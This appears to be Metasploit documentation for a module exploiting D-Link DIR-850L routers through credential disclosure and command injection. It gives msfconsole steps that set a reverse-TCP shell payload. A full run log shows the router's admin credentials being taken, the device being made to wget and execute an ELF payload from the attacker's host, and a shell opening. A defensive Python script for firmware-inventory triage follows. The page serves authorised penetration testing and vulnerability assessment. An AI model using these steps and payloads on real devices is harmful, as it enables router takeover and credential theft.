The module `dlink_dir850l_unauth_exec` leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here: https://www.seebug.org/vuldb/ssvid-96333. Setting the command to `reboot` will force the router into an infinite loop.

## Vulnerable Application

1. Start msfconsole
2. Do: `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
3. Do: `set RHOST [RouterIP]`
4. Do: `set PAYLOAD linux/mipsbe/shell/reverse_tcp`
5. Do: `run`
6. If the router is vulnerable, the payload should be dropped via wget and executed, and a session should be obtained

## Example

```
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_dir850l_unauth_exec) > check
[*] 192.168.0.14:80 The target service is running, but could not be validated.
msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
VERBOSE => true
msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
LPORT => 3131
msf exploit(dlink_dir850l_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.0.11:3131
[*] 192.168.0.14:80 - Connecting to target...
[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
[*] 192.168.0.14:80 - Sending payload to the server...
[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
[*] Sending stage (84 bytes) to 192.168.0.14
[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
[+] Deleted /tmp/uoskutcy
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

190745749
wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
true
pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
pwd
/
```
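The affected range stated above (DIR-850L, non-"Cloud" models, firmware up to 1.14B07) is the part a defender needs when triaging a device inventory. The following is an added example, not code from the module or the Metasploit project; it assumes D-Link firmware strings follow the `<major>.<minor>B<build>` pattern seen in "1.14B07" and that the inventory records are (model, firmware) pairs, which are constructed sample data.

```python
import re
from typing import List, Optional, Tuple

# Last firmware version the page lists as potentially vulnerable.
LAST_VULNERABLE_VERSION = "1.14B07"

# Assumption: firmware strings look like "1.14B07" (<major>.<minor>B<build>).
# Anything else is reported as unparseable rather than guessed at.
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)B(\d+)\s*$", re.IGNORECASE)


def parse_version(version: str) -> Optional[Tuple[int, int, int]]:
    """Turn '1.14B07' into (1, 14, 7); return None if the format is unknown."""
    m = _VERSION_RE.match(version)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_potentially_vulnerable(model: str, version: str) -> Optional[bool]:
    """Triage one inventory record against the affected range on the page.

    Returns True/False, or None when the version string could not be parsed,
    so the record can be flagged for manual review instead of silently skipped.
    """
    model_norm = model.strip().upper().replace("_", "-").replace(" ", "")
    # Only the DIR-850L is in scope, and the page excludes the "Cloud" models.
    if not model_norm.startswith("DIR-850L") or "CLOUD" in model_norm:
        return False
    parsed = parse_version(version)
    if parsed is None:
        return None
    return parsed <= parse_version(LAST_VULNERABLE_VERSION)


# Constructed sample inventory (model, firmware); not real devices.
SAMPLE_INVENTORY: List[Tuple[str, str]] = [
    ("DIR-850L", "1.14B07"),
    ("DIR-850L", "1.09B04"),
    ("DIR-850L", "1.15B02"),
    ("DIR-850L Cloud", "1.14B07"),
    ("DIR-850L", "unknown"),
]


def triage(inventory):
    """Bucket records into 'vulnerable', 'patched' and 'review' lists."""
    out = {"vulnerable": [], "patched": [], "review": []}
    for model, version in inventory:
        verdict = is_potentially_vulnerable(model, version)
        key = "review" if verdict is None else ("vulnerable" if verdict else "patched")
        out[key].append((model, version))
    return out
```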